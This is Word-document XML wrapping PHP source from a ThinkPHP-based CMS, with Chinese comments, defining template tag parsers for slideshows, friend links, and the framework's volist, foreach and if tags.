    </w:p>
    <w:p w14:paraId="2B6377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EE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Slide($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663EF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9EC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 = isset($tag['id']) ? $tag['id'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFC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d = isset($tag['tid']) ? $tag['tid'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC54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sset($tag['field']) ? $tag['field'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0488F2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 ? $tag['order'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CE8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52DAE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33156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5634E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46C74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 /*unset</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>销毁代码，处理怪异问题，待研究</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A8CD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74DEF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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>轮播图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E133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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F806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id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F5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FA20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分组</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个指定分组填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>逗号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECF94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d" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7DD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d'] =   $tid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724517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992D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slide')-&gt;where(\$where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12669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排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040E3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2FDD8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606171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5422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des desc,id desc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257E24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52D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调用自定义属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B69F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ield" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A5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field("$field");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D650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C54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分页与数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A91B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343CE2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0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED145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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5D0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46C6A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pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33DF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0C6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list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D637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2140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数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A51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498634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3C9CB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76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638EE4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D29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开始赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4499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LIST__ = \$list;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2B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 =&gt; \$fx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734B5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2CD56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12051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683E4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37B0C5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parse;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A2A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17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9CA5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友情链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378D0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3FA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Link($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9BB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5E5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sset($tag['id']) ? $tag['id'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F6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sset($tag['order']) ? $tag['order'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605EB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sset($tag['limit']) ? $tag['limit'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C352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ze = isset($tag['pagesize']) ? $tag['pagesize'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3CA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isset($tag['img']) ? $tag['img'] : "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3773F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lt;&lt;EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614C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168F44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 /*unset</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>销毁代码，处理怪异问题，待研究</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11315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2E2ED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指定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563AD3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D230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id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9D3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16F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判断是否有缩略图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04784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 != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA4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img'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629E9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g'] =   ['neq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2D52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mg'=='imageNo'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B7B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g'] =   ['eq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED8C6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4A4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E2F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think\Db::name('link')-&gt;where(\$where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD8F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排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D455D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order" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59281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order");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F63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E61D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order("des desc,id desc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD87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5D9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分页与数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E1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 !=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59127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ize==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345EFB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEEA9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0DA75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paginate($pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DACA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845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list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421D54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A4215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数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434D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limit" != 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A350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limit($limit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3052CD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8F3E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list-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594AB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7755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开始赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5707B9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__LIST__ = \$list;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6190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__LIST__ as \$k =&gt; \$fx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF6E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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4B2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OF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BC89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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F0B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 .= '&lt;?php endforeach;?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531663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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF3B2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0C8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7130B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think\template\taglib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B01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template\TagLib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2E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44090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X</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签库解析类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD0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egory   Think</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D93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ckage  Think</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23F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subpackage  Driver.Taglib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3991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uthor    liu21st &lt;liu21st@gmail.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D3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84F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x extends Taglib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB9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553EC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tags = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB393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hp'        =&gt; ['attr' =&gt; ''],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072AF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olist'     =&gt; ['attr' =&gt; 'name,id,offset,length,key,mod', 'alias' =&gt; 'iterate'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A83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gt; ['attr' =&gt; 'name,id,item,key,offset,length,mod', 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C195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gt; ['attr' =&gt; 'condition', 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FD44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if'     =&gt; ['attr' =&gt; 'condition', 'close' =&gt; 0, 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06370B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gt; ['attr' =&gt; '', 'close' =&gt; 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD6B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gt; ['attr' =&gt; 'name', 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA7C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gt; ['attr' =&gt; 'value,break', 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEC0A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    =&gt; ['attr' =&gt; '', 'close' =&gt; 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634B81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mpare'    =&gt; ['attr' =&gt; 'name,value,type', 'alias' =&gt; ['eq,equal,notequal,neq,gt,lt,egt,elt,heq,nheq', 'type']],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A1A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ange'      =&gt; ['attr' =&gt; 'name,value,type', 'alias' =&gt; ['in,notin,between,notbetween', 'type']],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE09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pty'      =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2E4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empty'   =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A96C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sent'    =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D1F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present' =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B939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ined'    =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEAC9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defined' =&gt; ['attr' =&gt; 'name'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43301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       =&gt; ['attr' =&gt; 'file,href,type,value,basepath', 'close' =&gt; 0, 'alias' =&gt; ['import,css,js', 'type']],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266EA0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ssign'     =&gt; ['attr' =&gt; 'name,value', 'close' =&gt; 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D203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ine'     =&gt; ['attr' =&gt; 'name,value', 'close' =&gt; 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587126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        =&gt; ['attr' =&gt; 'start,end,name,comparison,step'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D55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gt; ['attr' =&gt; 'link,vars,suffix,domain', 'close' =&gt; 0, 'expression' =&gt; true],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBEF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nction'   =&gt; ['attr' =&gt; 'name,vars,use,call'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E5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223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5078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hp</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2829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31BE1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hp}echo $name{/php}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6476D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ccess public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36A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44B8E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11A49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72C37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74A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Php($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276860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5BC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 . $content . ' ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB9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752FC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676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EF3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volist</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>循环输出数据集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369C01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19E4E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volist name="userList" id="user" empty=""}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9595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er.username}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E923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er.email}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B394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volist}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6027B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6EF82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405FE8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3A5A4A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void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EDE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806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Volist($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7C7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A971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336F1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tag['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FFB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pty  = isset($tag['empty']) ? $tag['empty'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B1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empty($tag['key']) ? $tag['key'] : 'i';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA8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d    = isset($tag['mod']) ? $tag['mod'] : '2';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EC0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ffset = !empty($tag['offset']) &amp;&amp; is_numeric($tag['offset']) ? intval($tag['offset']) : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DCD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ength = !empty($tag['length']) &amp;&amp; is_numeric($tag['length']) ? intval($tag['length']) : 'null';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7114C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D74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name, 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126EA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A46C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47656C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_result=' . $name . ';';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E4F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_result';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551731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5D5B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238CDB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BC2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if(is_array(' . $name . ') || ' . $name . ' instanceof \think\Collection): $' . $key . ' = 0;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F30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0 != $offset || 'null' != $length) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F8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__LIST__ = is_array(' . $name . ') ? array_slice(' . $name . ',' . $offset . ',' . $length . ', true) : ' . $name . '-&gt;slice(' . $offset . ',' . $length . ', true); ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F14E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9C9F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 $__LIST__ = ' . $name . ';';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4698C6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091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if( count($__LIST__)==0 ) : echo "' . $empty . '" ;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD2DE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else: ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC0B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foreach($__LIST__ as $key=&gt;$' . $id . '): ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7651E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rseStr .= '$mod = ($' . $key . ' % ' . $mod . ' );';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB3CE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 . $key . ';?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130BE6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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A951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endforeach; endif; else: echo "' . $empty . '" ;endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB8C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arseStr)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEBD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6AD08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3EA7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9ABD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6892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D6B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each</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>循环输出数据集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8D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163D10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each name="userList" id="user" key="key" index="i" mod="2" offset="3" length="5" empty=""}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F05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er.username}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529703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each}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F9D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0301A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1F02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25B78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void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D10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5704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Foreach($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13511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20C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tag['expression'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A7D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ression = ltrim(rtrim($tag['expression'], ')'), '(');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F74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ression = $this-&gt;autoBuildVar($expression);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A360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foreach(' . $expression . '): ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B171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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3655DF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endforeach; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C74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6B70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4B3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2D7D5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empty($tag['key']) ? $tag['key'] : 'key';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB43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tem   = !empty($tag['id']) ? $tag['id'] : $tag['item'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C80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pty  = isset($tag['empty']) ? $tag['empty'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B596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ffset = !empty($tag['offset']) &amp;&amp; is_numeric($tag['offset']) ? intval($tag['offset']) : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00964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ength = !empty($tag['length']) &amp;&amp; is_numeric($tag['length']) ? intval($tag['length']) : 'null';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2133E8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7A8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substr($name, 0, 1)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B61A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  = '$_' . uniqid();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D01FD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00680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var . '=' . $name . '; ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDFE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var;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7F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EEA2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77405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9D8A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if(is_array(' . $name . ') || ' . $name . ' instanceof \think\Collection): ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7FC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0 != $offset || 'null' != $length) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6107B2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var)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4C6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 = '$_' . uniqid();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30802A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ED85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rseStr .= $var . ' = is_array(' . $name . ') ? array_slice(' . $name . ',' . $offset . ',' . $length . ', true) : ' . $name . '-&gt;slice(' . $offset . ',' . $length . ', true); ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619A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B83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 = &amp;$name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66794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DE9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if( count(' . $var . ')==0 ) : echo "' . $empty . '" ;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66026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else: ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0571E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tag['index'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE90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dex = $tag['index'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACE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 . $index . '=0; ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA98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885E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foreach(' . $var . ' as $' . $key . '=&gt;$' . $item . '): ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569DA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tag['index'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A2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dex = $tag['index'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599B8A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tag['mod'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0AD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d = (int) $tag['mod'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1AB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mod = ($' . $index . ' % ' . $mod . '); ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF828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2A0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 . $index . '; ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2531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D66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gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E224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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A13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endforeach; endif; else: echo "' . $empty . '" ;endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D039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arseStr)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2940B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299B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D54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95C4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647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77C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if</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C8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141211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if condition=" $a eq 1"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437DB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if condition="$a eq 2" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDAC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CAE9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if}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215073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表达式支持</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> eq neq gt egt lt elt == &gt; &gt;= &lt; &lt;= or and || &amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A9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63001F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16D85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03F60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0FAEAE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624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If($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45017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754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 = !empty($tag['expression']) ? $tag['expression'] : $tag['condition'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EABC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 = $this-&gt;parseCondition($condition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00139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 . $condition . '): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC2D1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4BE6B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D64D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67C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if</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
